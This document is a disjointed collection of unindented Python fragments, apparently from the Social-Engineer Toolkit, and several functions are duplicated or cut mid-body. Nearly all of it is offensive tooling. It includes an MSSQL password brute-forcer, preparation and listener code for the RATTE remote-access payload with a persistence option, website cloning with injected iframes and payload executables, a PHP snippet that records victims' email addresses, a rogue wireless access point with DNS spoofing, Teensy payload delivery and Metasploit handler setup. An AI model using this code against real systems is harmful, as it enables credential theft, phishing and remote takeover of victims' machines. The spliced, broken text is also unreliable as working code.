def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ":" in ipaddr:
ipaddr = ipaddr.split(":")
ipaddr, port = ipaddr
ipaddr = str(ipaddr)
port = str(port)
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
successful_password = None
with open(wordlist) as passwordlist:
for password in passwordlist:
password = password.rstrip()
# try actual password
try:
# connect to the sql server and attempt a password
print("Attempting to brute force {bold}{ipaddr}:{port}{endc}"
" with username of {bold}{username}{endc}"
" and password of {bold}{passwords}{endc}".format(ipaddr=ipaddr,
username=username,
passwords=password,
port=port,
bold=core.bcolors.BOLD,
endc=core.bcolors.ENDC))
target_server = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
if target_server:
core.print_status("\nSuccessful login with username {0} and password: {1}".format(username,
password))
counter = 1
successful_password = password
break
# if login failed or unavailable server
except:
pass
# if we brute forced a machine
if counter == 1:
return ",".join([ipaddr, username, port, successful_password])
# else we didnt and we need to return a false
else:
if ipaddr:
core.print_warning("Unable to guess the SQL password for {0} with username of {1}".format(ipaddr, username))
return False
def scan(range,lowport,highport):
# scan the ranges
from src.core import portscan
portscan=portscan.launch(range, lowport, highport)
# if we returned values
if portscan != False:
return portscan
# if nothing is returned
if portscan == False:
setcore.print_warning("No MSSQL servers were found in the ranges specified")
return False
# return the portscan value
return portscan
def scan(range, lowport, highport):
# scan the ranges
from src.core import portscan
portscan = portscan.launch(range, lowport, highport)
# if we returned values
if portscan != False:
return portscan
# if nothing is returned
if portscan == False:
setcore.print_warning(
"No MSSQL servers were found in the ranges specified")
return False
# return the portscan value
return portscan
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port),
username, passwords)
# print that we were successful
setcore.print_status(
"\nSuccessful login with username %s and password: %s" %
(username, passwords))
counter = 1
break
# if invalid password
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != '':
setcore.print_warning(
"Unable to guess the SQL password for %s with username of %s"
% (ipaddr, username))
return False
def brute(ipaddr, username, port, wordlist):
# if ipaddr being passed is invalid
if ipaddr == "":
return False
if ipaddr != "":
# base counter for successful brute force
counter = 0
# build in quick wordlist
if wordlist == "default":
wordlist = "src/fasttrack/wordlist.txt"
# read in the file
password = file(wordlist, "r")
for passwords in password:
passwords = passwords.rstrip()
# try actual password
try:
print "Attempting to brute force " + setcore.bcolors.BOLD + ipaddr + setcore.bcolors.ENDC + " with username of " + setcore.bcolors.BOLD + username + setcore.bcolors.ENDC + " and password of " + setcore.bcolors.BOLD + passwords + setcore.bcolors.ENDC
# connect to the sql server and attempt a password
target_server = _mssql.connect(ipaddr + ":" + str(port), username, passwords)
# print that we were successful
setcore.print_status("\nSuccessful login with username %s and password: %s" % (username, passwords))
counter = 1
break
# if invalid password
except Exception, e:
pass
# if we brute forced a machine
if counter == 1:
return ipaddr + "," + username + "," + str(port) + "," + passwords
# else we didnt and we need to return a false
else:
if ipaddr != "":
setcore.print_warning(
"Unable to guess the SQL password for %s with username of %s" % (ipaddr, username)
)
return False
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" % os.path.join(core.setdir + "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
from src.core.menu import text
sys.path.append("/etc/setoolkit")
from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(core.definepath)
try:
input = raw_input
except:
pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning(
"apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
core.print_warning(
"DNSSpoof was not found. Please install or correct path in set_config. Exiting...."
)
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
core.print_info("using SET's local airbase-ng binary")
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace("<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server, (web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace("<body>",
"<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
filewrite.write(data)
core.print_status("All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()
fileopen = file("config/set_config", "r")
for line in fileopen:
line = line.rstrip()
# define if we use upx encoding or not
match = re.search("UPX_ENCODE=", line)
if match:
upx_encode = line.replace("UPX_ENCODE=", "")
# set the upx flag
match1 = re.search("UPX_PATH=", line)
if match1:
upx_path = line.replace("UPX_PATH=", "")
if upx_encode == "ON":
if not os.path.isfile(upx_path):
if operating_system != "windows":
setcore.print_warning(
"UPX packer not found in the pathname specified in config. Disabling UPX packing for executable"
)
upx_encode == "OFF"
# if we removed the set shells to free up space, needed for pwniexpress
match2 = re.search("SET_INTERACTIVE_SHELL=", line)
if match2:
line = line.replace("SET_INTERACTIVE_SHELL=", "").lower()
if line == "off":
sys.exit(
"\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config"
)
# make directory if it's not there
if not os.path.isdir("src/program_junk/web_clone/"):
os.makedirs("src/program_junk/web_clone/")
def main():
valid_site = False
valid_ip = False
valid_response = False
input_counter = 0
#################
# get User Input
#################
# ipaddr=input(setprompt(["9", "2"], "IP address to connect back on"))
while valid_ip != True and input_counter < 3:
ipaddr = input(
core.setprompt(["9", "2"],
"Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error(
"\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
# try:
# ratteport=int(input(setprompt(["9", "2"], "Port RATTE Server should listen on")))
# while ratteport==0 or ratteport > 65535:
# print_warning('Port must not be equal to javaport!')
# ratteport=int(input(setprompt(["9", "2"], "Enter port RATTE Server should listen on")))
# except ValueError:
# ratteport=8080
try:
ratteport = int(
input(
core.setprompt(["9", "2"],
"Port RATTE Server should listen on [8080]")))
while ratteport == 0 or ratteport > 65535:
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(
input(
core.setprompt(
["9", "2"],
"Enter port RATTE Server should listen on [8080]")))
except ValueError:
# core.print_info("Port set to default of 8080")
ratteport = 8080
# persistent=input(setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# if persistent == 'no' or persistent == '' or persistent == 'n':
# persistent='NO'
# else:
# persistent='YES'
while not valid_response:
persistent = input(
core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
persistent = str.lower(persistent)
if persistent == "no" or persistent == "n":
persistent = "NO"
valid_response = True
elif persistent == "yes" or persistent == "y":
persistent = "YES"
valid_response = True
else:
core.print_warning(text.YES_NO_RESPONSES)
valid_response = False
customexe = input(
core.setprompt([
"9", "2"
], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
############
# prepare RATTE
############
prepare_ratte(ipaddr, ratteport, persistent, customexe)
core.print_status("Payload has been exported to %s" %
os.path.join(core.userconfigpath, "ratteM.exe"))
###################
# start ratteserver
###################
# prompt=input(setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]"))
# if prompt == "yes" or prompt == "" or prompt == "y":
# print_info("Starting ratteserver...")
# ratte_listener_start(ratteport)
while not valid_response:
prompt = input(
core.setprompt(["9", "2"],
"Start the ratteserver listener now [yes|no]"))
prompt = str.lower(prompt)
if prompt == "no" or prompt == "n":
# prompt = "NO"
core.print_error("Aborting...")
sleep(2)
valid_response = True
elif prompt == "yes" or prompt == "y":
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
core.print_info("Stopping ratteserver...")
sleep(2)
valid_response = True
else:
core.print_warning(
"valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")
core.exit_set()
# if we are running posix then check to see what the process is first
if operating_system == "posix":
# if we detect an apache installation
if os.path.isfile("/etc/init.d/apache2"):
apache_stop = input("[!] Apache may be running, do you want SET to stop the process? [y/n]: ")
if apache_stop.lower() == "y" or apache_stop.lower() == "yes":
core.print_status("Attempting to stop apache.. One moment..")
# stop apache here
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
try:
ipaddr.connect(('localhost', web_port))
if ipaddr:
core.print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config")
core.print_error("Exit whatever is listening and restart SET")
core.exit_set()
# if it couldn't connect to localhost, we are good to
# go and continue forward
except:
core.print_status("Success! Apache was stopped. Moving forward within SET...")
# if we don't want to stop apache then exit SET and flag
# user
if apache_stop.lower() == "n" or apache_stop.lower() == "no":
core.print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config and turn apache on")
core.print_error("Exit whatever is lsitening or turn Apache on in set_config and restart SET")
core.exit_set()
else:
core.print_warning("If you want to use Apache, edit the /etc/setoolkit/set.config")
core.print_status("Your attack has been created in the SET home directory (/root/.set/) folder 'autorun'")
core.print_status("Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.")
core.print_info("Copy the contents of the folder to a CD/DVD/USB to autorun")
# if we want to launch payload and automatically create listener
if trigger in [1, 2, 3]:
choice1 = core.yesno_prompt("0", "Create a listener right now [yes|no]")
if choice1.lower() == "yes" or choice1.lower() == "y":
# if we used something to create other than solo.py then write out the
# listener
if not os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config"), 'w') as filewrite, \
open(os.path.join(core.setdir, "payload.options")) as fileopen:
for line in fileopen:
line = line.split(" ")
filewrite.write("use multi/handler\n")
filewrite.write("set payload {0}\n".format(line[0]))
filewrite.write("set lhost {0}\n".format(line[1]))
filewrite.write("set lport {0}\n".format(line[2]))
filewrite.write("set ExitOnSession false\n")
filewrite.write("exploit -j\r\n\r\n")
# create the listener
core.print_status("Launching Metasploit.. This could take a few. Be patient! Or else no shells for you..")
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "meta_config")),
shell=True).wait()
else:
core.print_warning("cancelling...")
sleep(2)
def main():
valid_site = False
valid_ip = False
valid_persistence = False
input_counter= 0
site_input_counter=0
#pause=raw_input("This module has finished completing. Press <enter> to continue")
# Get a *VALID* website address
while valid_site != True and site_input_counter < 3:
website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
site = urlparse.urlparse(website)
if site.scheme == "http" or site.scheme == "https":
if site.netloc != "":
valid_site = True
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
sleep(4)
return
else:
core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
site_input_counter += 1
else:
if site_input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
site_input_counter +=1
#core.DebugInfo("site.scheme is: %s " % site.scheme)
#core.DebugInfo("site.netloc is: %s " % site.netloc)
#core.DebugInfo("site.path is: %s " % site.path)
#core.DebugInfo("site.params are: %s " % site.params)
#core.DebugInfo("site.query is: %s " % site.query)
#core.DebugInfo("site.fragment is: %s " % site.fragment)
while valid_ip != True and input_counter < 3:
ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
valid_ip = core.validate_ip(ipaddr)
if not valid_ip:
if input_counter == 2:
core.print_error("\nMaybe you have the address written down wrong?")
sleep(4)
return
else:
input_counter += 1
#javaport must be 80, cause applet uses in web injection port 80 to download payload!
try:
javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
while javaport == 0 or javaport > 65535:
if javaport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if javaport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
javaport = int(raw_input(core.setprompt(["9", "2"],"Port Java applet should listen on [80]")))
except ValueError:
#core.print_info("Port set to default of 80")
javaport = 80
#javaport=80
try:
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
while ratteport == javaport or ratteport == 0 or ratteport > 65535:
if ratteport == javaport:
core.print_warning("Port must not be equal to javaport!")
if ratteport == 0:
core.print_warning(text.PORT_NOT_ZERO)
if ratteport > 65535:
core.print_warning(text.PORT_TOO_HIGH)
ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
except ValueError:
ratteport = 8080
persistent = core.yesno_prompt(["9","2"], "Should RATTE be persistentententent [no|yes]?")
# j0fer 06-27-2012 # while valid_persistence != True:
# j0fer 06-27-2012 # persistent=raw_input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?"))
# j0fer 06-27-2012 # persistent=str.lower(persistent)
# j0fer 06-27-2012 # if persistent == "no" or persistent == "n":
# j0fer 06-27-2012 # persistent="NO"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # elif persistent == "yes" or persistent == "y":
# j0fer 06-27-2012 # persistent="YES"
# j0fer 06-27-2012 # valid_persistence = True
# j0fer 06-27-2012 # else:
# j0fer 06-27-2012 # core.print_warning(text.YES_NO_RESPONSES)
customexe=raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))
#######################################
# prepare RATTE
#######################################
prepare_ratte(ipaddr,ratteport,persistent,customexe)
######################################
# Java Applet Attack to deploy RATTE
#######################################
core.print_info("Starting java applet attack...")
java_applet_attack_tw(website,javaport, "reports/",ipaddr)
fileopen=file("%s/src/program_junk/rand_gen" % (definepath), "r")
for line in fileopen:
ratte_random = line.rstrip()
subprocess.Popen("cp %s/src/program_junk/ratteM.exe %s/reports/%s" % (definepath,definepath,ratte_random), shell=True).wait()
#######################
# start ratteserver
#######################
core.print_info("Starting ratteserver...")
ratte_listener_start(ratteport)
######################
# stop webserver
######################
stop_web_server_tw()
return
import time
import src.core.setcore as core
from src.core.menu import text
sys.path.append("/etc/setoolkit")
from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(core.definepath)
try: input = raw_input
except: pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
core.print_info("using SET's local airbase-ng binary")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
It works by reading natively off the SDCard into a buffer space thats then
written out through the keyboard.
""")
# if we hit here we are good since msfvenom is installed
print("""
.-. .-. . . .-. .-. .-. .-. .-. . . .-. .-. .-.
|.. |-| |\| |.. `-. | |- |( |\/| | | | )|-
`-' ` ' ' ` `-' `-' ' `-' ' ' ' ` `-' `-' `-'
enabled.\n""")
# grab the path and filename from user
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if not os.path.isfile(path):
while True:
core.print_warning("Filename not found, try again")
path = input(core.setprompt(["6"], "Path to the file you want deployed on the teensy SDCard"))
if os.path.isfile(path):
break
core.print_warning("Note: This will only deliver the payload, you are in charge of creating the listener if applicable.")
core.print_status("Converting the executable to a hexadecimal form to be converted later...")
with open(path, "rb") as fileopen:
data = fileopen.read()
data = binascii.hexlify(data)
with open("converts.txt", "w") as filewrite:
filewrite.write(data)
print("[*] File converted successfully. It has been exported in the working directory under 'converts.txt'. "
"Copy this one file to the teensy SDCard.")
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
